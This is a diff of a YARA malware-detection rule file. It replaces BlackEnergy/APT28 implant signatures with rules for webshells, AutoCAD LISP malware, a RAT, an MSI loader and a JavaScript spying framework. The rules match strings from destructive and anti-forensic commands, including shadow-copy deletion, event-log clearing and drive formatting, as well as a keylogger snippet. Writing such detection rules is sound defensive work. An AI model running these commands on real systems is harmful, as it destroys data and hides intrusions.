+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of them
+		filesize < 5MB and ( $png at 0 or $jpg at 0 or $gif at 0 or $gif at 3 or $gif2 at 0 or $gif2 at 3 or $gif3 at 0 or $mdb at 0 ) and ( ( ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) or ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) ) ) or ( ( any of ( $cjsp* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) ) or ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_Mixed_OBFUSC : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "2edaeb08-19bc-5ab4-bc75-40c16ba85d9f"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L505-L520"
+		description = "Detects webshell with mixed obfuscation commands"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dcb4054b-0c87-5cd0-9297-7fd5f2e37437"
+		date = "2023-01-28"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6860-L6884"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd4edd238cdc3d376c1d5bcea6c8df57f4ef03369c0ca22107241812e0a1bb94"
-		score = 85
+		logic_hash = "76cc6390cbdb81055c72edb124db2bf52e3d0b975406367a9c49a0ee6621d30b"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c4e5c6bdfcc86fa27bdfb075a7c9a769423ec6d53b73c80cbc71a6f8dd5aace"
+		hash2 = "78f2086b6308315f5f0795aeaa75544128f14889a794205f5fc97d7ca639335b"
+		hash3 = "3bca764d44074820618e1c831449168f220121698a7c82e9909f8eab2e297cbd"
+		hash4 = "b26b5e5cba45482f486ff7c75b54c90b7d1957fd8e272ddb4b2488ec65a2936e"
+		hash5 = "e217be2c533bfddbbdb6dc6a628e0d8756a217c3ddc083894e07fd3a7408756c"
+		importance = 70
 
 	strings:
-		$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64}
-		$BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32}
-		$CONSTANT = {26 80 AC C8}
+		$s1 = "rawurldecode/*" ascii
+		$s2 = "preg_replace/*" ascii
+		$s3 = " __FILE__/*" ascii
+		$s4 = "strlen/*" ascii
+		$s5 = "str_repeat/*" ascii
+		$s6 = "basename/*" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 200KB and ( 4 of them ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V3_Alternativerule : HIGHVOL FILE
+rule SIGNATURE_BASE_WEBSHELL_Cookie_Post_Obfuscation : FILE
 {
 	meta:
-		description = "Detects a group of different malware samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "47e9028b-7718-5372-8a1a-94c208c29ed4"
-		date = "2017-02-12"
-		modified = "2025-07-01"
-		reference = "US CERT Grizzly Steppe Report"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L788-L803"
+		description = "Detects webshell using cookie POST"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cc5ded80-5e58-5b25-86d1-1c492042c740"
+		date = "2023-01-28"
+		modified = "2023-04-05"
+		reference = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6886-L6912"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35468f7699b96fcaaaa032eef7dae34ec314e9c652f9f8b2e8ca7343fb5cec50"
+		hash = "d08a00e56feb78b7f6599bad6b9b1d8626ce9a6ea1dfdc038358f4c74e6f65c9"
+		hash = "2ce5c4d31682a5a59b665905a6f698c280451117e4aa3aee11523472688edb31"
+		hash = "ff732d91a93dfd1612aed24bbb4d13edb0ab224d874f622943aaeeed4356c662"
+		hash = "a3b64e9e065602d2863fcab641c75f5d8ec67c8632db0f78ca33ded0f4cea257"
+		hash = "d41abce305b0dc9bd3a9feb0b6b35e8e39db9e75efb055d0b1205a9f0c89128e"
+		hash = "333560bdc876fb0186fae97a58c27dd68123be875d510f46098fc5a61615f124"
+		hash = "2efdb79cdde9396ff3dd567db8876607577718db692adf641f595626ef64d3a4"
+		hash = "e1bd3be0cf525a0d61bf8c18e3ffaf3330c1c27c861aede486fd0f1b6930f69a"
+		hash = "f8cdedd21b2cc29497896ec5b6e5863cd67cc1a798d929fd32cdbb654a69168a"
+		logic_hash = "87229859ca3ee8f8b79360603c421528cda2ecefcc46d4080236d09b2dd510fb"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		comment = "Alternative rule - not based on the original samples but samples on which the original rule matched"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
+		tags = "FILE"
+		importance = 70
 
 	strings:
-		$op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 }
-		$op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 }
+		$s1 = "]($_COOKIE, $_POST) as $"
+		$s2 = "function"
+		$s3 = "Array"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them )
+		( uint16( 0 ) == 0x3f3c and filesize < 100KB and ( all of them ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V4 : FILE
+rule SIGNATURE_BASE_SUSP_Autocad_Lsp_Malware : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "27a5fb98-fe8b-561c-b490-e04257e7dd1c"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L807-L822"
+		description = "Recognizes malicious autocad files written in LISP"
+		author = "John Lambert @JohnLaTwC"
+		id = "3a4ac6e1-d7ea-5b9a-a386-9f881fad073b"
+		date = "2019-02-04"
+		modified = "2023-12-05"
+		reference = "http://cadablog.blogspot.com/2012/06/acadmedrea-malware-autocad-based-virus.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_autocad_lsp_malware.yar#L1-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49c912f29f5ffbd90366a510285ef3f06c804af86829808c175c8be519ce01c4"
-		score = 85
-		quality = 85
+		logic_hash = "4a5fe7016e27431407435541ab71ab00e6fd53418e2ebc19f8764c98728b89a6"
+		score = 65
+		quality = 52
 		tags = "FILE"
+		hash1 = "1313398e2f39fcf17225c7e915b92bd74292d427163112d70b82f271359b84d5"
+		hash2 = "2382e6908e6b44c0676c537cb8caa239c8938cb01e62a45c7247d40ab7dbf0ad"
+		hash3 = "23cf3e7f41a755a45e396e5caa3e753e64655b91fe665808f71aa68718670dc8"
+		hash4 = "23f018135afc4890e1e09bef9386e45e2236fc43550383b7888cddbdefbcd950"
+		hash5 = "4a8da078a02fc49b7f13cd19d10519b1bf31ed0ab04268f018ad4733918e28ff"
+		hash6 = "4cca7b530213ef71b2e69a5b11178b61044f93dc60f4e8e568ddb3bb06749ba2"
+		hash7 = "5390271899e1ebf884380f5da7d26dff527d13922d3b3f8a3b5ec9152b9dfa40"
+		hash8 = "53ef3029f36a3a2b912a722d64eef04f599f6f683c6dcb31a122ab1c98f38700"
+		hash9 = "7f7d78931370fa693cbfa50aadecc09b4ab93917dcde3a653bd67fa6dc274cdc"
+		hash10 = "8147cc97b6203c7eccfbd10457eb52527f74180ebae79bf3cb9c9edb582e708c"
+		hash11 = "8a3113ceb45725539e4ccef5ea1482c29b2bbe0ce7ede72f59f9949a0e04c5cd"
+		hash12 = "a0c77993f84ca8fb3096579088326bc907b003327f5885660ea5ba47e2cbc6de"
+		hash13 = "a20ac5e0bfa2ee3cb4092907420c23d1f94a1ed1b59cc3d351e5602d7206178c"
+		hash14 = "b201969ed7bf782d01011211b48bfccb9dd41a3a5a7456cdff2167f1e4d1b954"
+		hash15 = "b2bac49288329a777e7aa7001e9383eec75719c08f2aa8c278b44fabeb74844f"
+		hash16 = "b772dce92319bb48df39db6ab701761bd7645a771fd7f394510d5951695e7e96"
+		hash17 = "c116cc4db6f77c580c1c4f8acda537ed04e597739bc83011773dbeb77adf93e3"
+		hash18 = "ca1b9026b5d69c0981ca088330180d4865602fc2b514fd838664d3e11eab4468"
+		hash19 = "d7a814d677f9f9dd9666dc4f4bb9cca88fa90bdb074e87006e8810eef9a0fb32"
+		hash20 = "e4acfb69006b8aecf5801e36e2c69ccfeea2e8cbad4ceda9228d2dae2c8fd023"
+		hash21 = "f9d6b894ca907145464058a4e2c78de84bf592609b46f3573bfd9e0029e1c778"
 
 	strings:
-		$DK_format1 = "/c format %c: /Y /Q" ascii
-		$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
-		$DK_physicaldrive = "PhysicalDrive%d" wide
-		$DK_shutdown = "shutdown /r /t %d"
+		$s1 = /\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)/
+		$s2 = /vl\-list\-\>string\s+\'\(\d+\s+\d+\s+\d+\s+\d+\s+\d+\s+/
+		$m1 = "strcat" nocase fullword
+		$m2 = "write-line" nocase fullword
+		$m3 = "open" nocase fullword
+		$m4 = /acad\w*\.lsp\"/ nocase fullword
+		$n1 = "vl-registry-write" nocase fullword
+		$n2 = "NOHIDDEN" nocase fullword
+		$n3 = "vlax-create-object " nocase fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $DK* )
+		filesize < 1MB and uint8( 0 ) == 0x28 and ( 1 of ( $s* ) or all of ( $m* ) or all of ( $n* ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V5 : FILE
+rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_Hizorrat : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "d203f3c6-4e86-5632-ad5d-61763ee59bbe"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L824-L838"
+		description = "Detects hiZor RAT"
+		author = "Florian Roth"
+		id = "06fd02f2-2630-5aac-8011-67d67ff42c3f"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hizor_rat.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9d4233ccf148919d0ad0be726b9dfa9e26a9afcebb7b26fa4db4c3da8c46d13e"
-		score = 85
+		logic_hash = "4e3224d34db788d2cba9da74690bf75429d6e8a516d7666d0331e465d08640cb"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
 
 	strings:
-		$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
+		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
+		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
+		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
+		$s4 = "CmdProcessExited" wide ascii
+		$s5 = "rootDir" wide ascii
+		$s6 = "DllRegisterServer" wide ascii
+		$s7 = "GetNativeSystemInfo" wide ascii
+		$s8 = "%08x%08x%08x%08x" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V7 : FILE
+rule SIGNATURE_BASE_Octowave_Installer_03_2025 : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "a0dda12a-22b6-53e6-9528-8c178ad871ad"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L859-L881"
+		description = "Detects resources embedded within Octowave Loader MSI installers"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "56685a0a-523d-4060-a008-aa28542cb85c"
+		date = "2025-03-28"
+		modified = "2025-04-08"
+		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_installer_mar25.yar#L1-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27ae70d384488660c1f80040503d3eb6541112fd6332edc5820bc6718d76b847"
-		score = 85
-		quality = 85
+		logic_hash = "14b6247cf619ecb8f14fc0a860fa4285e58db2defa15488cda1b2431b3e3e980"
+		score = 75
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05b025b8475c0acbc9a5d2cd13c15088a2fb452aa514d0636f145e1c4c93e6ee"
+		hash2 = "500462c4fb6e4d0545f04d63ef981d9611b578948e5cfd61d840ff8e2f206587"
+		hash3 = "5ee9e74605b0c26b39b111a89139d95423e54f7a54decf60c7552f45b8b60407"
+		hash4 = "76efc8c64654d8f2318cc513c0aaf0da612423b1715e867b4622712ba0b3926f"
+		hash5 = "c3e2af892b813f3dcba4d0970489652d6f195b7985dc98f08eaddca7727786f0"
+		hash6 = "d7816ba6ddda0c4e833d9bba85864de6b1bd289246fcedae84b8a6581db3f5b6"
+		hash7 = "e93969a57ef2a7aee13a159cbf2015e2c8219d9153078e257b743d5cd90f05cb"
+		hash8 = "45984ae78d18332ecb33fe3371e5eb556c0db86f1d3ba8a835b72cd61a7eeecf"
 
 	strings:
-		$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
-		$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
-		$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
-		$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
-		$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
-		$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
-		$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
+		$string1 = "LaunchConditionsValidateProductIDProcessComponentsUnpublishFeaturesRemoveFilesRegisterUserRegisterProductInstalled OR PhysicalMemory >= 2048" ascii
+		$string2 = ".cab" ascii
+		$string3 = ".wav" ascii
+		$string4 = ".dll" ascii
+		$supporting1 = ".raw" ascii
+		$supporting2 = ".db" ascii
+		$supporting3 = ".pak" ascii
+		$supporting4 = ".bin" ascii
+		$supporting5 = ".bak" ascii
+		$supporting6 = ".dat" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 3 of them
+		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 200000KB and all of ( $string* ) and 1 of ( $supporting* )
 }
-
-rule SIGNATURE_BASE_IMPLANT_4_V8
+rule SIGNATURE_BASE_Apt_CN_Tetris_JS_Advanced_1 : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "1e82d105-8dda-55c9-aec0-8f9f02c3a94e"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L883-L911"
+		description = "Unique code from Jetriz, Swid & Jeniva of the Tetris framework"
+		author = "@imp0rtp3 (modified by Florian Roth)"
+		id = "a56f69f5-3562-52ab-9686-411019c51055"
+		date = "2020-09-06"
+		modified = "2023-12-05"
+		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tetris.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd072702c59822587d7ede0bc59c5672fbaa9a05595940781554fadb32e109f7"
-		score = 85
+		logic_hash = "ec4ba53fea05c5331ed900b8c7da4cddd4ab64e87dfc165ac18d72d22f754d87"
+		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4
-         33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B
-         DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D
-         3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50
-         68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9
-         7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF
-         57 18}
-		$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08
-         2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00
-         8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8
-         89 45 F8 8B 4D EC 83 C1 08 89 4D FC}
-		$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF
-         66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66
-         8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00
-         F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
-         65 6C 54 FF 57}
-		$a1 = {83 EC 04 60 E9 1E 01 00 00}
-
-	condition:
-		$a1 at pe.entry_point or any of ( $f* )
-}
-rule SIGNATURE_BASE_IMPLANT_4_V9
-{
-	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "a404212a-d9ef-54c1-bbf8-a213ec094f18"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L913-L933"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c0e48bf0839965f9bda9cc475aba5b4934c27c426a8fa4423fb24aa9d792e2e4"
-		score = 85
-		quality = 77
-		tags = ""
-
-	strings:
-		$a = "wevtutil clear-log" ascii wide nocase
-		$b = "vssadmin delete shadows" ascii wide nocase
-		$c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
-		$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
-		$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52
-         50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89
-         44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ??
-         ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
-		$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
-
-	condition:
-		($a and $b ) or $c or $d or ( $openPhysicalDiskOverwriteWithZeros and $f )
-}
-rule SIGNATURE_BASE_IMPLANT_4_V10 : FILE
-{
-	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "75c266ca-a27f-5ffe-a438-c35bbacfa70c"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L935-L966"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f22fd45eb77ff1a8202f4bd0d0c43787c8184300e96aff021e13371ae7bd5553"
-		score = 85
-		quality = 81
 		tags = "FILE"
 
 	strings:
-		$ = {A1B05C72}
-		$ = {EB3D0384}
-		$ = {6F45594E}
-		$ = {71815A4E}
-		$ = {D5B03E72}
-		$ = {6B43594E}
-		$ = {F572993D}
-		$ = {665D9DC0}
-		$ = {0BE7A75A}
-		$ = {F37443C5}
-		$ = {A2A474BB}
-		$ = {97DEEC67}
-		$ = {7E0CB078}
-		$ = {9C9678BF}
-		$ = {4A37A149}
-		$ = {8667416B}
-		$ = {0A375BA4}
-		$ = {DC505A8D}
-		$ = {02F1F808}
-		$ = {2C819712}
+		$a1 = "var a0_0x"
+		$b1 = "a0_0x" ascii
+		$cx1 = "))),function(){try{var _0x"
+		$cx2 = "=window)||void 0x0===_0x"
+		$cx3 = "){if(opener&&void 0x0!==opener["
+		$cx4 = "String['fromCharCode'](0x"
+		$e1 = "')](__p__)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 and 15 of them
+		$a1 at 0 or ( filesize < 1000KB and ( #b1 > 300 or #e1 > 1 or 2 of ( $cx* ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V11 : FILE
+rule SIGNATURE_BASE_Apt_CN_Tetrisplugins_JS : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "e5fb0843-20f7-56a0-8eea-0db7cef7f610"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L968-L985"
+		description = "Code and strings of plugins from the Tetris framework loaded by Swid"
+		author = "@imp0rtp3"
+		id = "83e6fbad-55d6-5229-a17d-8929e0e658f8"
+		date = "2020-09-06"
+		modified = "2023-12-05"
+		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tetris.yar#L34-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7bdeddc4334ed6557175b5eefc78d69283d6c91f98970bd0cfe6365b3ab477f4"
-		score = 85
-		quality = 85
+		logic_hash = "fa77d622584e79c86139b9c0f0b8ff46fc10461d0776e46c93490b6bb667afcf"
+		score = 75
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$ = "/c format %c: /Y /X /FS:NTFS"
-		$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
-		$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
-		$ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
-		$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
+		$a3 = "(0xbb8);this['socketWatcher'](0xbb9);this["
+		$a4 = "a2869674571f77b5a0867c3d71db5856"
+		$a5 = "\\x0a\\x20\\x20var\\x20data\\x20=\\x20{}\\x0a\\x20\\x20window.c\\x20=\\x200\\x0a\\x20\\x20script2\\x20=\\x20document.createElement(\\x22script\\x22)\\x0a\\x20\\x20script2.async\\x20=\\x20true\\x0a\\x20\\x20script2.src\\x20=\\x20\\x22"
+		$a6 = "{isPluginCallback:\\x20true,\\x20data,\\x20plugin:\\x20'"
+		$a7 = "\\x20\\x22*\\x22)\\x0a\\x20\\x20}\\x0a\\x20\\x20document.documentElement.appendChild("
+		$b1 = "String(str).match(/red\">(.*?)<\\/font>/)"
+		$b2 = "['data']);}};}},{'key':'run','value':function _0x"
+		$b3 = "},{'plugin':this['plugin'],'save':!![],'type':_typeof("
+		$b4 = "Cannot\\x20call\\x20a\\x20class\\x20as\\x20a\\x20function"
+		$b5 = "The\\x20command\\x20is\\x20sent\\x20successfully,\\x20wait\\x20for\\x20the\\x20result\\x20to\\x20return"
+		$b6 = "getUserMedia\\x20is\\x20not\\x20implemented\\x20in\\x20this\\x20browser"
+		$b7 = "{'autoplay':'true'},!![]);setTimeout(function(){return $('#'+"
+		$b8 = "keyLogger($('input'));\n        keyLogger($('textarea'));"
